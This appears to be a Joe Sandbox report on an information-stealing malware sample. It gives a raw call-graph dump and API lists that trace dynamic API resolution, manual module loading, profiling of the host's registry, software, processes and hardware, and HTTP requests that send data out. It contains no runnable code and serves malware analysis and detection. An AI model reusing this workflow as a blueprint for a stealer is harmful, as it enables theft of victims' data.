lstrcat 54185->54202 54187 4010b1 _EH_prolog lstrcpy 54187->54202 54189 40fa28 3 API calls 54189->54202 54192 40f9e1 lstrcpy 54192->54202 54200 40f95a lstrcpy 54200->54202 54202->54171 54202->54175 54202->54178 54202->54181 54202->54182 54202->54185 54202->54187 54202->54189 54202->54192 54202->54200 54925 40d3fa _EH_prolog 54202->54925 54979 40d6bb _EH_prolog 54202->54979 55091 40b8af _EH_prolog 54202->55091 54476 40f923 lstrcpy 54475->54476 54477 402128 54476->54477 54477->53383 54479 401081 54478->54479 54479->53405 54480->53383 54481->53383 54482->53383 54483->53383 54484->53396 54485->53399 54486->53388 54487->53378 54488->53399 54489->53363 54490->53399 54491->53347 54492->53399 54494 40f923 lstrcpy 54493->54494 54495 402142 54494->54495 54495->53338 54496->53348 54497->53388 54499 4104c0 54498->54499 54500 40f923 lstrcpy 54499->54500 54501 4104d0 54500->54501 54501->53435 54502->53440 54504 403a6d 54503->54504 54504->54504 54505 403a74 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 54504->54505 54514 40fb4d 54505->54514 54507 403ab6 lstrlenA 54515 40fb4d 54507->54515 54509 403ac6 InternetCrackUrlA 54510 403ae4 54509->54510 54510->53449 54511->53574 54513 40f995 54512->54513 54513->53498 54514->54507 54515->54509 54516->53583 54517->53762 54518->53764 54519->53766 54520->53768 54521->53772 54522->53774 54524 40626c LocalAlloc 54523->54524 54525 4058f9 54523->54525 54524->54525 54526 40627c CryptStringToBinaryA 54524->54526 54525->53627 54525->53638 54526->54525 54527 406293 LocalFree 54526->54527 54527->54525 54528->53782 54529->53790 54530->53801 54531->53832 54533 410461 RegQueryValueExA 54532->54533 54534 41047c RegCloseKey CharToOemA 54532->54534 54533->54534 54534->53846 54536 411041 54535->54536 54537 411025 K32GetModuleFileNameExA CloseHandle 54535->54537 54538 40f923 lstrcpy 54536->54538 54537->54536 54539 411050 54538->54539 54539->53890 54669 40fbbd 54540->54669 54543 41067e RegOpenKeyExA 54545 4106b6 RegCloseKey 54543->54545 54546 41069e RegQueryValueExA 54543->54546 54544 410677 54544->53912 54545->54544 54546->54545 54548 4107e5 54547->54548 54549 4108ea 54548->54549 54550 4107ed CoSetProxyBlanket 54548->54550 54551 40f923 lstrcpy 54549->54551 54552 41081d 54550->54552 54553 4108fb 54551->54553 54552->54549 54554 410851 VariantInit 54552->54554 54553->53926 54555 410874 54554->54555 54676 4106c4 _EH_prolog CoCreateInstance 54555->54676 54557 410882 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 54558 40f923 lstrcpy 54557->54558 54559 4108de VariantClear 54558->54559 54559->54553 54561 41098e 54560->54561 54562 410996 CoSetProxyBlanket 54561->54562 54565 410a33 54561->54565 54566 4109c6 54562->54566 54563 40f923 lstrcpy 54564 410a44 54563->54564 54564->53940 54565->54563 54566->54565 54567 4109f2 VariantInit 54566->54567 54568 410a15 54567->54568 54682 410c8d LocalAlloc CharToOemW 54568->54682 54570 410a1d 54571 40f923 lstrcpy 54570->54571 54572 410a27 VariantClear 54571->54572 54572->54564 54574 40fc33 54573->54574 54574->53954 54575->53967 54577 40f923 lstrcpy 54576->54577 54578 41040d 54577->54578 54578->53982 54580 40f923 lstrcpy 54579->54580 54581 40fd0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 54580->54581 54582 40fdf8 54581->54582 54587 40fd48 54581->54587 54584 40fe00 LocalFree 54582->54584 54585 40fe09 54582->54585 54583 40fd4d GetLocaleInfoA 54583->54587 54584->54585 54585->53996 54586 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 54586->54587 54587->54582 54587->54583 54587->54586 54588 40f9e1 lstrcpy 54587->54588 54588->54587 54589->54009 54591 40fce0 54590->54591 54592 40fcc4 wsprintfA 54590->54592 54591->54024 54592->54591 54594 40fe73 RegCloseKey 54593->54594 54595 40fe5b RegQueryValueExA 54593->54595 54594->54041 54595->54594 54597 40ff06 GetLogicalProcessorInformationEx 54596->54597 54598 40ff11 54597->54598 54599 40fedc GetLastError 54597->54599 54685 410ade GetProcessHeap HeapFree 54598->54685 54600 40ff65 54599->54600 54601 40fee7 54599->54601 54604 40ff6f 54600->54604 54686 410ade GetProcessHeap HeapFree 54600->54686 54603 40feeb 54601->54603 54603->54597 54610 40ff5e 54603->54610 54683 410ade GetProcessHeap HeapFree 54603->54683 54684 410afb GetProcessHeap HeapAlloc 54603->54684 54604->54056 54605 40ff38 54605->54604 54609 40ff3e wsprintfA 54605->54609 54609->54604 54610->54604 54611->54069 54687 410aa7 54612->54687 54615 40ffc1 wsprintfA 54615->54083 54618 40f923 lstrcpy 54617->54618 54621 410010 54618->54621 54619 41004c EnumDisplayDevicesA 54620 410061 54619->54620 54619->54621 54620->54098 54621->54619 54621->54620 54622 40f997 2 API calls 54621->54622 54622->54621 54624 40f923 lstrcpy 54623->54624 54625 4102ed CreateToolhelp32Snapshot Process32First 54624->54625 54626 410386 CloseHandle 54625->54626 54630 41031e 54625->54630 54626->54111 54627 410372 Process32Next 54627->54626 54627->54630 54628 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 54628->54630 54629 40f9e1 lstrcpy 54629->54630 54630->54627 54630->54628 54630->54629 54632 40f923 lstrcpy 54631->54632 54633 410095 RegOpenKeyExA 54632->54633 54634 4100c8 54633->54634 54649 4100e7 54633->54649 54636 40f95a lstrcpy 54634->54636 54635 4100f0 RegEnumKeyExA 54637 410119 wsprintfA RegOpenKeyExA 54635->54637 54635->54649 54645 4100d4 54636->54645 54639 410285 RegCloseKey 54637->54639 54640 41015d RegQueryValueExA 54637->54640 54638 410283 54641 41028e RegCloseKey 54638->54641 54639->54641 54642 410187 lstrlenA 54640->54642 54643 41026e RegCloseKey 54640->54643 54644 40f95a lstrcpy 54641->54644 54642->54643 54642->54649 54643->54649 54644->54645 54645->54125 54646 4101f2 RegQueryValueExA 54646->54643 54646->54649 54647 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 54647->54649 54648 40f9e1 lstrcpy 54648->54649 54649->54635 54649->54638 54649->54643 54649->54646 54649->54647 54649->54648 54689 413460 _EH_prolog 54650->54689 54652 41445a 54653 40f9e1 lstrcpy 54652->54653 54654 41447c 54653->54654 54655 40f9e1 lstrcpy 54654->54655 54656 4144a0 54655->54656 54657 40f9e1 lstrcpy 54656->54657 54658 4144ac 54657->54658 54659 40f9e1 lstrcpy 54658->54659 54660 4144b8 54659->54660 54661 4144bf Sleep 54660->54661 54662 4144cf CreateThread WaitForSingleObject 54660->54662 54661->54660 54663 40f923 lstrcpy 54662->54663 54693 413326 _EH_prolog 54662->54693 54664 4144fd 54663->54664 54691 4134ac _EH_prolog 54664->54691 54666 414510 54667 401061 _EH_prolog 54666->54667 54668 41451c 54667->54668 54668->54147 54672 40fb50 GetProcessHeap HeapAlloc RegOpenKeyExA 54669->54672 54671 40fbc2 54671->54543 54671->54544 54673 40fb93 RegQueryValueExA 54672->54673 54674 40fbaa RegCloseKey 54672->54674 54673->54674 54675 40fbb9 54674->54675 54675->54671 54677 410758 54676->54677 54678 4106fa SysAllocString 54676->54678 54677->54557 54678->54677 54680 410709 54678->54680 54679 410751 SysFreeString 54679->54677 54680->54679 54681 410735 _wtoi64 SysFreeString 54680->54681 54681->54679 54682->54570 54683->54603 54684->54603 54685->54605 54686->54604 54688 40ffab GlobalMemoryStatusEx 54687->54688 54688->54615 54690 413479 54689->54690 54690->54652 54692 4134cc 54691->54692 54692->54666 54702 40fb4d 54693->54702 54695 413347 lstrlenA 54699 41335e 54695->54699 54701 413353 54695->54701 54696 40f95a lstrcpy 54696->54699 54698 40f9e1 lstrcpy 54698->54699 54699->54696 54699->54698 54700 413406 StrCmpCA 54699->54700 54703 4043ad _EH_prolog 54699->54703 54700->54699 54700->54701 54702->54695 54704 40f95a lstrcpy 54703->54704 54705 4043dd 54704->54705 54706 403a54 6 API calls 54705->54706 54707 4043e9 54706->54707 54908 410dac 54707->54908 54709 404415 54710 404420 lstrlenA 54709->54710 54711 404430 54710->54711 54712 410dac 4 API calls 54711->54712 54713 40443e 54712->54713 54714 40f923 lstrcpy 54713->54714 54715 40444e 54714->54715 54716 40f923 lstrcpy 54715->54716 54717 40445f 54716->54717 54718 40f923 lstrcpy 54717->54718 54719 404470 54718->54719 54720 40f923 lstrcpy 54719->54720 54721 404481 54720->54721 54722 40f923 lstrcpy 54721->54722 54723 404492 StrCmpCA 54722->54723 54725 4044ae 54723->54725 54724 4044d4 54726 410b5c 3 API calls 54724->54726 54725->54724 54727 4044c3 InternetOpenA 54725->54727 54728 4044df 54726->54728 54727->54724 54738 404cf2 54727->54738 54729 40fa28 3 API calls 54728->54729 54730 4044f5 54729->54730 54731 40f9e1 lstrcpy 54730->54731 54732 404502 54731->54732 54733 40fa9c 4 API calls 54732->54733 54734 40452e 54733->54734 54735 40fa28 3 API calls 54734->54735 54736 404544 54735->54736 54737 40fa9c 4 API calls 54736->54737 54739 404558 54737->54739 54740 40f95a lstrcpy 54738->54740 54741 40f9e1 lstrcpy 54739->54741 54750 404c4e 54740->54750 54742 404565 54741->54742 54743 40fa9c 4 API calls 54742->54743 54744 40459e 54743->54744 54745 40fa28 3 API calls 54744->54745 54746 4045b1 54745->54746 54747 40f9e1 lstrcpy 54746->54747 54748 4045be 54747->54748 54749 4045d6 InternetConnectA 54748->54749 54749->54738 54750->54699 54909 410dbd CryptBinaryToStringA 54908->54909 54910 410db9 54908->54910 54909->54910 54911 410dda GetProcessHeap HeapAlloc 54909->54911 54910->54709 54911->54910 54912 410df7 CryptBinaryToStringA 54911->54912 54912->54910 54921->54156 55285 4060a4 54922->55285 54924 4060ea 54924->54202 54926 40f923 lstrcpy 54925->54926 54927 40d41e 54926->54927 55338 410d21 SHGetFolderPathA 54927->55338 54930 40fa28 3 API calls 54931 40d448 54930->54931 54932 40f9e1 lstrcpy 54931->54932 54933 40d455 54932->54933 54934 40fa28 3 API calls 54933->54934 54935 40d47d 54934->54935 54980 40f923 lstrcpy 54979->54980 54981 40d6df 54980->54981 54982 40f923 lstrcpy 54981->54982 54983 40d6f0 54982->54983 54984 40d709 StrCmpCA 54983->54984 54985 40d9a3 54984->54985 54986 40d71a 54984->54986 54988 410d21 2 API calls 54985->54988 54987 410d21 2 API calls 54986->54987 54989 40d723 54987->54989 54990 40d9ac 54988->54990 54991 40fa28 3 API calls 54989->54991 54992 40fa28 3 API calls 54990->54992 54993 40d736 54991->54993 54994 40d9bf 54992->54994 54995 40f9e1 lstrcpy 54993->54995 54996 40f9e1 lstrcpy 54994->54996 54997 40d743 54995->54997 54998 40d9cc 54996->54998 55092 40f923 lstrcpy 55091->55092 55093 40b8d2 55092->55093 55094 40f923 lstrcpy 55093->55094 55095 40b8e3 55094->55095 55096 410d21 2 API calls 55095->55096 55097 40b8f2 55096->55097 55098 40fa28 3 API calls 55097->55098 55099 40b905 55098->55099 55100 40f9e1 lstrcpy 55099->55100 55101 40b912 55100->55101 55102 40fa28 3 API calls 55101->55102 55162 40eced 55161->55162 55163 40e88e RegGetValueA 55161->55163 55164 401061 _EH_prolog 55162->55164 55165 40e8b2 55163->55165 55166 40e8cc 55163->55166 55167 40ecf9 55164->55167 55165->55162 55168 40e8bb RegCloseKey 55165->55168 55166->55165 55169 40e8e2 RegOpenKeyExA 55166->55169 55170 40e8d6 RegCloseKey 55166->55170 55167->54177 55168->55162 55169->55162 55171 40e8fd RegEnumKeyExA 55169->55171 55170->55169 55171->55165 55172 40e91a 55171->55172 55173 40f923 lstrcpy 55172->55173 55174 40e927 55173->55174 55175 40e985 RegGetValueA 55174->55175 55190 40eb6d StrCmpCA 55174->55190 55192 40f9e1 lstrcpy 55174->55192 55193 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 55174->55193 55194 40ec15 RegEnumKeyExA memset memset 55174->55194 56179 40e2ff 155 API calls 55174->56179 56180 40dd10 55174->56180 55176 40fa9c 4 API calls 55175->55176 55190->55174 55192->55174 55193->55174 55194->55174 55209 40f923 lstrcpy 55208->55209 55210 40bc0c 55209->55210 55211 410d21 2 API calls 55210->55211 55286 4060af 55285->55286 55289 405f70 55286->55289 55288 4060c0 55288->54924 55292 405e09 55289->55292 55293 405e22 55292->55293 55304 405e1a 55292->55304 55308 4059a0 55293->55308 55297 405e55 55297->55304 55320 405c2e 55297->55320 55302 405f10 FreeLibrary 55302->55302 55303 405f22 55302->55303 55333 410ade GetProcessHeap HeapFree 55303->55333 55304->55288 55307 405ecf 55307->55304 55334 410ade GetProcessHeap HeapFree 55307->55334 55310 4059af 55308->55310 55309 4059b6 55309->55304 55314 405a53 55309->55314 55310->55309 55311 405a06 55310->55311 55335 410afb GetProcessHeap HeapAlloc 55311->55335 55313 405a15 55313->55309 55315 405a9b VirtualAlloc 55314->55315 55316 405a72 55314->55316 55317 405ad1 55315->55317 55318 405acb 55315->55318 55316->55315 55317->55297 55318->55317 55319 405ad6 VirtualAlloc 55318->55319 55319->55317 55321 405d56 55320->55321 55322 405c48 55320->55322 55321->55304 55329 405d69 55321->55329 55322->55321 55323 405c62 LoadLibraryA 55322->55323 55324 405d5c 55323->55324 55327 405c7c 55323->55327 55324->55321 55326 405d28 GetProcAddress 55326->55324 55326->55327 55327->55322 55327->55324 55327->55326 55336 410afb GetProcessHeap HeapAlloc 55327->55336 55337 410ade GetProcessHeap HeapFree 55327->55337 55330 405d7f 55329->55330 55332 405dfe 55329->55332 55331 405dd4 VirtualProtect 55330->55331 55330->55332 55331->55330 55331->55332 55332->55302 55332->55303 55332->55304 55332->55307 55333->55307 55334->55304 55335->55313 55336->55327 55337->55327 55339 40f923 lstrcpy 55338->55339 55340 40d435 55339->55340 55340->54930 56179->55174 56494 4138e7 56495 4138f2 56494->56495 56496 401061 _EH_prolog 56495->56496 56497 4138fe 56496->56497

                                                                                          Executed Functions

                                                                                          Function 00417645 Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
                                                                                          • GetProcAddress.KERNEL32 ref: 00417670
                                                                                          • GetProcAddress.KERNEL32 ref: 00417687
                                                                                          • GetProcAddress.KERNEL32 ref: 0041769E
                                                                                          • GetProcAddress.KERNEL32 ref: 004176B5
                                                                                          • GetProcAddress.KERNEL32 ref: 004176CC
                                                                                          • GetProcAddress.KERNEL32 ref: 004176E3
                                                                                          • GetProcAddress.KERNEL32 ref: 004176FA
                                                                                          • GetProcAddress.KERNEL32 ref: 00417711
                                                                                          • GetProcAddress.KERNEL32 ref: 00417728
                                                                                          • GetProcAddress.KERNEL32 ref: 0041773F
                                                                                          • GetProcAddress.KERNEL32 ref: 00417756
                                                                                          • GetProcAddress.KERNEL32 ref: 0041776D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417784
                                                                                          • GetProcAddress.KERNEL32 ref: 0041779B
                                                                                          • GetProcAddress.KERNEL32 ref: 004177B2
                                                                                          • GetProcAddress.KERNEL32 ref: 004177C9
                                                                                          • GetProcAddress.KERNEL32 ref: 004177E0
                                                                                          • GetProcAddress.KERNEL32 ref: 004177F7
                                                                                          • GetProcAddress.KERNEL32 ref: 0041780E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417825
                                                                                          • GetProcAddress.KERNEL32 ref: 0041783C
                                                                                          • GetProcAddress.KERNEL32 ref: 00417853
                                                                                          • GetProcAddress.KERNEL32 ref: 0041786A
                                                                                          • GetProcAddress.KERNEL32 ref: 00417881
                                                                                          • GetProcAddress.KERNEL32 ref: 00417898
                                                                                          • GetProcAddress.KERNEL32 ref: 004178AF
                                                                                          • GetProcAddress.KERNEL32 ref: 004178C6
                                                                                          • GetProcAddress.KERNEL32 ref: 004178DD
                                                                                          • GetProcAddress.KERNEL32 ref: 004178F4
                                                                                          • GetProcAddress.KERNEL32 ref: 0041790B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417922
                                                                                          • GetProcAddress.KERNEL32 ref: 00417939
                                                                                          • GetProcAddress.KERNEL32 ref: 00417950
                                                                                          • GetProcAddress.KERNEL32 ref: 00417967
                                                                                          • GetProcAddress.KERNEL32 ref: 0041797E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417995
                                                                                          • GetProcAddress.KERNEL32 ref: 004179AC
                                                                                          • GetProcAddress.KERNEL32 ref: 004179C3
                                                                                          • GetProcAddress.KERNEL32 ref: 004179DA
                                                                                          • GetProcAddress.KERNEL32 ref: 004179F1
                                                                                          • GetProcAddress.KERNEL32 ref: 00417A08
                                                                                          • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                                          • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                                          • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                                          • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                                          • GetProcAddress.KERNEL32(75290000), ref: 00417AD2
                                                                                          • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B00
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B17
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                                          • GetProcAddress.KERNEL32(734C0000), ref: 00417B4D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B64
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417B92
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                                          • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                                          • GetProcAddress.KERNEL32(752C0000), ref: 00417C09
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C20
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C37
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C65
                                                                                          • GetProcAddress.KERNEL32(74EC0000), ref: 00417C84
                                                                                          • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                                          • GetProcAddress.KERNEL32(75BD0000), ref: 00417D16
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D44
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D72
                                                                                          • GetProcAddress.KERNEL32 ref: 00417D89
                                                                                          • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                                          • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                                          • GetProcAddress.KERNEL32(75A70000), ref: 00417DE9
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E00
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E17
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E45
                                                                                          • GetProcAddress.KERNEL32(75450000), ref: 00417E60
                                                                                          • GetProcAddress.KERNEL32 ref: 00417E77
                                                                                          • GetProcAddress.KERNEL32(75DA0000), ref: 00417E92
                                                                                          • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                                          • GetProcAddress.KERNEL32(6F090000), ref: 00417EC8
                                                                                          • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                                          • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F24
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F52
                                                                                          • GetProcAddress.KERNEL32 ref: 00417F69
                                                                                          • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                                          • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                                          • GetProcAddress.KERNEL32(75AF0000), ref: 00417FB0
                                                                                          • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                                          • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                                          • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                          • GetProcAddress.KERNEL32(75D90000), ref: 00418010
                                                                                          • GetProcAddress.KERNEL32(6E3F0000), ref: 0041802B
                                                                                          • GetProcAddress.KERNEL32 ref: 00418042
                                                                                          • GetProcAddress.KERNEL32 ref: 00418059
                                                                                          • GetProcAddress.KERNEL32 ref: 00418070
                                                                                          • GetProcAddress.KERNEL32(6CE40000,SymMatchString), ref: 0041808A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                          • API String ID: 2238633743-951535364
                                                                                          • Opcode ID: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                          • Instruction ID: 5d64eb95f993e10cfffcd180ca7930ca50f89af3c14b7aa20224d1cce3759a27
                                                                                          • Opcode Fuzzy Hash: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                          • Instruction Fuzzy Hash: 0042D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54
                                                                                          Function 0040514C Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640networkstringmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 602 40514c-40521b _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 619 40521d 602->619 620 40521f-405222 602->620 619->620 621 4058d8-4058fe InternetCloseHandle call 40fb4d call 406242 620->621 622 405228-4053a6 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 620->622 631 405900-40592d call 40f997 call 40fa9c call 40f9e1 call 40f98e 621->631 632 405932-40599f call 410a94 * 2 call 40f98e * 4 call 401061 call 40f98e 621->632 622->621 702 4053ac-4053dd HttpOpenRequestA 622->702 631->632 703 4053e3-4053e5 702->703 704 4058cf-4058d2 InternetCloseHandle 702->704 705 4053e7-4053f7 InternetSetOptionA 703->705 706 4053fd-405875 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA 703->706 704->621 705->706 865 4058b1-4058c6 InternetReadFile 706->865 866 405877-40587c 865->866 867 4058c8-4058c9 InternetCloseHandle 865->867 866->867 868 40587e-4058ac call 40fa9c call 40f9e1 call 40f98e 866->868 867->704 868->865
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00405151
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                            • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                            • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425AC8,00000000), ref: 004057CC
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                          • memcpy.MSVCRT ref: 00405810
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                          • memcpy.MSVCRT ref: 00405843
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                          • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                          • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                          • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                          • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                          • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          Strings
                                                                                          Memory Dump Source
